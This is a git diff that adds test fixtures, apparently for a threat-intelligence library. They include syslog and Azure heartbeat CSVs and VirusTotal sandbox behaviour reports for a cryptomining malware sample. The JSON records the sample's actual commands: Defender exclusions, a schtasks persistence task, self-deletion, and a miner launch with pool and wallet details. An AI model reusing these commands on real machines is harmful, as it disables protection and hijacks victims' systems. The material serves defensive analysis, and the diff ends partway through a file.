+203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:51,squid-uk-02,7/8/2019 15:51,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:52,squid-uk-02,7/8/2019 15:52,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:52,squid-uk-02,7/8/2019 15:52,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:52,squid-uk-02,7/8/2019 15:52,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:54,squid-uk-02,7/8/2019 15:54,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:54,squid-uk-02,7/8/2019 15:54,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:54,squid-uk-02,7/8/2019 15:54,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:55,squid-uk-02,7/8/2019 15:55,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:55,squid-uk-02,7/8/2019 15:55,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:55,squid-uk-02,7/8/2019 15:55,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:56,squid-uk-02,7/8/2019 15:56,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:56,squid-uk-02,7/8/2019 15:56,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:56,squid-uk-02,7/8/2019 15:56,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
diff --git a/tests/testdata/ti_results.df.pkl b/tests/testdata/ti_results.df.pkl
new file mode 100644
index 000000000..2a0a6720b
Binary files /dev/null and b/tests/testdata/ti_results.df.pkl differ
diff --git a/tests/testdata/uploader/az_net.csv b/tests/testdata/uploader/az_net.csv
new file mode 100644
index 000000000..1b340182d
--- /dev/null
+++ b/tests/testdata/uploader/az_net.csv
@@ -0,0 +1,2 @@
+,PrivateIPAddresses,PublicIPAddresses
+0,10.0.6.5,51.140.160.102
diff --git a/tests/testdata/uploader/host_hb.csv b/tests/testdata/uploader/host_hb.csv
new file mode 100644
index 000000000..38f4c9a83
--- /dev/null
+++ b/tests/testdata/uploader/host_hb.csv
@@ -0,0 +1,2 @@
+,TenantId,SourceSystem,TimeGenerated,MG,ManagementGroupName,SourceComputerId,ComputerIP,Computer,Category,OSType,OSName,OSMajorVersion,OSMinorVersion,Version,SCAgentChannel,IsGatewayInstalled,RemoteIPLongitude,RemoteIPLatitude,RemoteIPCountry,SubscriptionId,ResourceGroup,ResourceProvider,Resource,ResourceId,ResourceType,ComputerEnvironment,Solutions,VMUUID,Type,_ResourceId
+0,b1315f05-4a7a-45b4-811f-73e715f7c122,OpsManager,2019-07-08 20:07:48,00000000-0000-0000-0000-000000000002,,2d39a7ab-bcb7-4384-9b9a-a1bf873434b3,51.140.160.102,squid-uk-02,Direct Agent,Linux,Ubuntu,18,04,1.11.0-7,Direct,,-0.13,51.5,United Kingdom,3b701f84-d04b-4479-89b1-fa8827eb537e,proxy,Microsoft.Compute,squid-uk-02,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourceGroups/proxy/providers/Microsoft.Compute/virtualMachines/squid-uk-02,virtualMachines,Azure,"""security"", ""networkMonitoring"", ""securityCenterFree"", ""securityInsights""",4acad4ff-aab2-934f-8b1f-2cadd5f23681,Heartbeat,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
diff --git a/tests/testdata/vt3_behavior_ms_sysinternals.json b/tests/testdata/vt3_behavior_ms_sysinternals.json
new file mode 100644
index 000000000..d7bbb8f88
--- /dev/null
+++ b/tests/testdata/vt3_behavior_ms_sysinternals.json
@@ -0,0 +1,383 @@
+{
+  "attributes": {
+    "command_executions": [
+      "\"%SAMPLEPATH%\\03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b.exe\" ",
+      "\"cmd\" /c powershell -Command Add-MpPreference -ExclusionPath '%%UserProfile%%' & powershell -Command Add-MpPreference -ExclusionPath '%%AppData%%' & powershell -Command Add-MpPreference -ExclusionPath '%%Temp%%' & powershell -Command Add-MpPreference -ExclusionPath '%%SystemRoot%%' & exit",
+      "powershell  -Command Add-MpPreference -ExclusionPath '%USERPROFILE% ",
+      "powershell  -Command Add-MpPreference -ExclusionPath '%USERPROFILE%\\AppData\\Roaming' ",
+      "powershell  -Command Add-MpPreference -ExclusionPath '%USERPROFILE%\\AppData\\Local\\Temp' ",
+      "powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Windows' ",
+      "\"C:\\Windows\\System32\\cmd.exe\" /c %USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe \"%SAMPLEPATH%\\03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b.exe\"",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe  \"%SAMPLEPATH%\\03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b.exe\"",
+      "\"C:\\Windows\\System32\\cmd.exe\" /c schtasks /create /f /sc onlogon /rl highest /tn \"services64\" /tr '\"C:\\Windows\\system32\\services64.exe\"' & exit",
+      "schtasks  /create /f /sc onlogon /rl highest /tn \"services64\" /tr '\"C:\\Windows\\system32\\services64.exe\"' ",
+      "\"C:\\Windows\\system32\\services64.exe\" ",
+      "\"C:\\Windows\\System32\\cmd.exe\" /C choice /C Y /N /D Y /T 3 & Del \"%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe\"",
+      "choice  /C Y /N /D Y /T 3 ",
+      "\"C:\\Windows\\System32\\cmd.exe\" /c %USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe \"C:\\Windows\\system32\\services64.exe\"",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe  \"C:\\Windows\\system32\\services64.exe\"",
+      "\"C:\\Windows\\system32\\Microsoft\\Libs\\sihost64.exe\" ",
+      "C:\\Windows\\explorer.exe  --cinit-find-x -B --algo=\"rx/0\" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr  --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=432nnXcxVAeRoC4NXAjsEcb2wBfdzJyv4dako7sUvUuN1wtr3t94FD4FJq9qpLRVkfaPEjMYiPnHa85WE38RxaFA8opkGCA.{COMPUTERNAME}/bobisoffline123@gmail.com --pass= --cpu-max-threads-hint=40  --cinit-stealth-targets=\"+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=\"  --tls  --cinit-stealth "
+    ],
+    "registry_keys_set": [
+      {
+        "key": "HKLM\\System\\CurrentControlSet\\Services\\WinRing0_1_2_0\\Start",
+        "value": "DWORD (0x00000003)"
+      },
+      {
+        "key": "HKLM\\System\\CurrentControlSet\\Services\\WinRing0_1_2_0\\ImagePath",
+        "value": "\\??\\%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Libs\\WR64.sys"
+      },
+      {
+        "key": "HKLM\\System\\CurrentControlSet\\Services\\WinRing0_1_2_0\\Start",
+        "value": "DWORD (0x00000004)"
+      }
+    ],
+    "has_evtx": false,
+    "ip_traffic": [
+      {
+        "transport_layer_protocol": "TCP",
+        "destination_ip": "185.65.135.234",
+        "destination_port": 58899
+      },
+      {
+        "transport_layer_protocol": "TCP",
+        "destination_ip": "13.107.4.50",
+        "destination_port": 80
+      },
+      {
+        "transport_layer_protocol": "TCP",
+        "destination_ip": "104.192.141.1",
+        "destination_port": 443
+      },
+      {
+        "transport_layer_protocol": "TCP",
+        "destination_ip": "51.255.34.118",
+        "destination_port": 14433
+      }
+    ],
+    "processes_injected": [
+      "C:\\Windows\\explorer.exe"
+    ],
+    "modules_loaded": [
+      "%SAMPLEPATH%\\03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b.exe",
+      "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\999d72a4e033bba86d05407570c67cba\\System.Management.Automation.ni.dll",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe",
+      "C:\\Windows\\System32\\wbem\\wmiutils.dll"
+    ],
+    "has_pcap": false,
+    "analysis_date": 1633393161,
+    "sandbox_name": "Microsoft Sysinternals",
+    "has_html_report": false,
+    "processes_terminated": [
+      "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
+      "C:\\Windows\\System32\\cmd.exe",
+      "C:\\Windows\\System32\\conhost.exe",
+      "%SAMPLEPATH%\\03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b.exe",
+      "C:\\Windows\\System32\\schtasks.exe",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe",
+      "C:\\Windows\\System32\\choice.exe",
+      "C:\\Windows\\System32\\services64.exe"
+    ],
+    "behash": "d20ecebc6540c2fba3024941a3a0070d",
+    "files_deleted": [
+      "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_szru5clb.hz1.ps1",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_uziie1be.o3w.psm1",
+      "%USERPROFILE%\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bxbbqyn1.42q.ps1",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zd5wo1bl.0s4.psm1",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1cnfgxx4.j3z.ps1",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vxbypyzm.i0l.psm1",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ptqjarqv.vxa.ps1",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0u55w3yq.ahp.psm1",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_impxnvm2.iu4.ps1",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_cmb001lx.5jn.psm1",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1w5qmr2u.zhw.ps1",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ofm3i11t.j3o.psm1",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_duzasj3i.aja.ps1",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_iuhb3i03.hko.psm1",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_acgbo4m5.cgl.ps1",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tb1memd2.3ud.psm1"
+    ],
+    "files_dropped": [
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_szru5clb.hz1.ps1"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_uziie1be.o3w.psm1"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bxbbqyn1.42q.ps1"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zd5wo1bl.0s4.psm1"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1cnfgxx4.j3z.ps1"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vxbypyzm.i0l.psm1"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ptqjarqv.vxa.ps1"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0u55w3yq.ahp.psm1"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b.exe.log"
+      },
+      {
+        "path": "C:\\Windows\\System32\\services64.exe"
+      },
+      {
+        "path": "C:\\Windows\\System32\\Tasks\\services64"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\svchost64.exe.log"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_impxnvm2.iu4.ps1"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_cmb001lx.5jn.psm1"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1w5qmr2u.zhw.ps1"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ofm3i11t.j3o.psm1"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_duzasj3i.aja.ps1"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_iuhb3i03.hko.psm1"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_acgbo4m5.cgl.ps1"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tb1memd2.3ud.psm1"
+      },
+      {
+        "path": "%USERPROFILE%\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\services64.exe.log"
+      },
+      {
+        "path": "C:\\Windows\\System32\\Microsoft\\Libs"
+      },
+      {
+        "path": "C:\\Windows\\System32\\Microsoft\\Libs\\sihost64.exe"
+      },
+      {
+        "path": "C:\\Windows\\System32\\Microsoft\\Libs\\WR64.sys"
+      },
+      {
+        "path": "C:\\Windows\\System32\\Microsoft\\Libs\\sihost64.log"
+      }
+    ],
+    "dns_lookups": [
+      {
+        "resolved_ips": [
+          "185.65.135.234"
+        ],
+        "hostname": "sanctam.net"
+      },
+      {
+        "resolved_ips": [
+          "104.192.141.1"
+        ],
+        "hostname": "bitbucket.org"
+      },
+      {
+        "resolved_ips": [
+          "135.125.238.108",
+          "51.255.34.118",
+          "51.15.54.102",
+          "185.71.66.31",
+          "51.15.58.224",
+          "46.105.31.147",
+          "51.15.78.68",
+          "51.68.143.81",
+          "217.182.169.148",
+          "51.83.33.228",
+          "51.15.65.182",
+          "51.15.69.136"
+        ],
+        "hostname": "xmr-eu1.nanopool.org"
+      }
+    ],
+    "last_modification_date": 1633393161,
+    "has_memdump": false,
+    "processes_created": [
+      "%SAMPLEPATH%\\03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b.exe",
+      "C:\\Windows\\System32\\cmd.exe",
+      "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
+      "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe",
+      "C:\\Windows\\System32\\schtasks.exe",
+      "C:\\Windows\\System32\\services64.exe",
+      "C:\\Windows\\System32\\choice.exe",
+      "C:\\Windows\\System32\\Microsoft\\Libs\\sihost64.exe",
+      "C:\\Windows\\explorer.exe"
+    ],
+    "processes_tree": [
+      {
+        "process_id": "3308",
+        "name": "%WINDIR%\\explorer.exe",
+        "children": [
+          {
+            "process_id": "3616",
+            "name": "%SAMPLEPATH%\\03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b.exe",
+            "children": [
+              {
+                "process_id": "2624",
+                "name": "C:\\Windows\\System32\\cmd.exe",
+                "children": [
+                  {
+                    "process_id": "1992",
+                    "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+                  },
+                  {
+                    "process_id": "3016",
+                    "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+                  },
+                  {
+                    "process_id": "2112",
+                    "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+                  },
+                  {
+                    "process_id": "2464",
+                    "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+                  }
+                ]
+              },
+              {
+                "process_id": "836",
+                "name": "C:\\Windows\\System32\\cmd.exe",
+                "children": [
+                  {
+                    "process_id": "4076",
+                    "name": "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe",
+                    "children": [
+                      {
+                        "process_id": "2044",
+                        "name": "C:\\Windows\\System32\\cmd.exe",
+                        "children": [
+                          {
+                            "process_id": "3552",
+                            "name": "C:\\Windows\\System32\\schtasks.exe"
+                          }
+                        ]
+                      },
+                      {
+                        "process_id": "1812",
+                        "name": "C:\\Windows\\System32\\services64.exe",
+                        "children": [
+                          {
+                            "process_id": "3504",
+                            "name": "C:\\Windows\\System32\\cmd.exe",
+                            "children": [
+                              {
+                                "process_id": "1692",
+                                "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+                              },
+                              {
+                                "process_id": "3752",
+                                "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+                              },
+                              {
+                                "process_id": "2828",
+                                "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+                              },
+                              {
+                                "process_id": "2508",
+                                "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+                              }
+                            ]
+                          },
+                          {
+                            "process_id": "1500",
+                            "name": "C:\\Windows\\System32\\cmd.exe",
+                            "children": [
+                              {
+                                "process_id": "3328",
+                                "name": "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe",
+                                "children": [
+                                  {
+                                    "process_id": "1368",
+                                    "name": "C:\\Windows\\System32\\cmd.exe",
+                                    "children": [
+                                      {
+                                        "process_id": "3808",
+                                        "name": "C:\\Windows\\System32\\schtasks.exe"
+                                      }
+                                    ]
+                                  },
+                                  {
+                                    "process_id": "1232",
+                                    "name": "C:\\Windows\\System32\\Microsoft\\Libs\\sihost64.exe"
+                                  },
+                                  {
+                                    "process_id": "3496",
+                                    "name": "C:\\Windows\\explorer.exe"
+                                  },
+                                  {
+                                    "process_id": "688",
+                                    "name": "C:\\Windows\\System32\\cmd.exe",
+                                    "children": [
+                                      {
+                                        "process_id": "2108",
+                                        "name": "C:\\Windows\\System32\\choice.exe"
+                                      }
+                                    ]
+                                  }
+                                ]
+                              }
+                            ]
+                          }
+                        ]
+                      },
+                      {
+                        "process_id": "3728",
+                        "name": "C:\\Windows\\System32\\cmd.exe",
+                        "children": [
+                          {
+                            "process_id": "3136",
+                            "name": "C:\\Windows\\System32\\choice.exe"
+                          }
+                        ]
+                      }
+                    ]
+                  }
+                ]
+              }
+            ]
+          }
+        ]
+      }
+    ],
+    "files_opened": [
+      "<Anonymous Pipe>",
+      "\\PSHost.132777415785472896.1992.DefaultAppDomain.powershell",
+      "\\PSHost.132777415837521828.3016.DefaultAppDomain.powershell",
+      "\\PSHost.132777415851398394.2112.DefaultAppDomain.powershell",
+      "\\PSHost.132777415864769081.2464.DefaultAppDomain.powershell",
+      "\\PSHost.132777415972973135.1692.DefaultAppDomain.powershell",
+      "\\PSHost.132777415989514431.3752.DefaultAppDomain.powershell",
+      "\\PSHost.132777416005653790.2828.DefaultAppDomain.powershell",
+      "\\PSHost.132777416019138289.2508.DefaultAppDomain.powershell"
+    ]
+  },
+  "type": "file_behaviour",
+  "id": "03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b_Microsoft Sysinternals",
+  "links": {
+    "self": "https://www.virustotal.com/api/v3/file_behaviours/03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b_Microsoft Sysinternals"
+  }
+}
\ No newline at end of file
diff --git a/tests/testdata/vt3_behavior_summary.json b/tests/testdata/vt3_behavior_summary.json
new file mode 100644
index 000000000..d4d40274c
--- /dev/null
+++ b/tests/testdata/vt3_behavior_summary.json
@@ -0,0 +1,2785 @@
+{
+  "processes_injected": [
+    "C:\\Windows\\explorer.exe"
+  ],
+  "processes_terminated": [
+    "%CONHOST% \"-40542629874978953113508502101955653726-2142237983-15632340143136557-1740783057",
+    "%CONHOST% \"15356416371858698971616655065-173220822-1013455786442835643-1696652431-72816561",
+    "%CONHOST% \"-12634762094492256852052013660509700669-6441467901049579719-680129457-131011644",
+    "%CONHOST% \"-332040313-94977547718957146-1428574376-696280166283831804-1774593772-1460146805",
+    "%CONHOST% \"-2110733797-1198848899-10704337151274322012-2051096861505498860-2032469123-1205974262",
+    "explorer.exe \"%windir%\\system32\\services64.exe\"",
+    "%windir%\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",
+    "\"%windir%\\System32\\services64.exe\" ",
+    "powershell  -Command Add-MpPreference -ExclusionPath '%HOME%' ",
+    "\"pwsh.exe\" -Command Add-MpPreference -ExclusionPath '%HOME%'",
+    "%SAMPLEPATH%",
+    "\"%ComSpec%\" /c %TEMP%\\svchost64.exe \"%SAMPLEPATH%\"",
+    "%TEMP%\\svchost64.exe  \"%SAMPLEPATH%\"",
+    "\"%windir%\\system32\\services64.exe\" ",
+    "powershell  -Command Add-MpPreference -ExclusionPath '%TEMP%' ",
+    "\"pwsh.exe\" -Command Add-MpPreference -ExclusionPath '%TEMP%'",
+    "powershell  -Command Add-MpPreference -ExclusionPath '%APPDATA%' ",
+    "\"pwsh.exe\" -Command Add-MpPreference -ExclusionPath '%APPDATA%'",
+    "powershell  -Command Add-MpPreference -ExclusionPath '%windir%' ",
+    "\"pwsh.exe\" -Command Add-MpPreference -ExclusionPath '%windir%'",
+    "\"%ComSpec%\" /c schtasks /create /f /sc onlogon /rl highest /tn \"services64\" /tr '\"%windir%\\system32\\services64.exe\"' & exit",
+    "schtasks  /create /f /sc onlogon /rl highest /tn \"services64\" /tr '\"%windir%\\system32\\services64.exe\"' ",
+    "\"%ComSpec%\" /C choice /C Y /N /D Y /T 3 & Del \"%TEMP%\\svchost64.exe\"",
+    "choice  /C Y /N /D Y /T 3 ",
+    "\"cmd\" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
+    "C:\\Windows\\System32\\cmd.exe",
+    "C:\\Windows\\System32\\conhost.exe",
+    "%SAMPLEPATH%\\03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b.exe",
+    "C:\\Windows\\System32\\schtasks.exe",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe",
+    "C:\\Windows\\System32\\choice.exe",
+    "C:\\Windows\\System32\\services64.exe",
+    "powershell -Command Add-MpPreference -ExclusionPath C:\\\\Users\\\\admin",
+    "itami.exe",
+    "powershell -Command Add-MpPreference -ExclusionPath C:\\\\Users\\\\<USER>\\\\AppData\\\\Roaming",
+    "schtasks /create /f /sc onlogon /rl highest /tn services64 /tr \"C:\\\\Windows\\\\system32\\\\services64.exe\"",
+    "C:\\Windows\\System32\\cmd.exe /c schtasks /create /f /sc onlogon /rl highest /tn services64 /tr \"C:\\\\Windows\\\\system32\\\\services64.exe\" & exit",
+    "powershell -Command Add-MpPreference -ExclusionPath C:\\\\Users\\\\<USER>\\\\AppData\\\\Local\\\\Temp",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\svchost64.exe C:\\Users\\<USER>\\Downloads\\itami.exe",
+    "C:\\Windows\\System32\\cmd.exe /c C:\\Users\\<USER>\\AppData\\Local\\Temp\\svchost64.exe C:\\Users\\<USER>\\Downloads\\itami.exe",
+    "choice /C Y /N /D Y /T 3",
+    "C:\\Windows\\System32\\cmd.exe /C choice /C Y /N /D Y /T 3 & Del C:\\Users\\<USER>\\AppData\\Local\\Temp\\svchost64.exe",
+    "powershell -Command Add-MpPreference -ExclusionPath C:\\\\Windows",
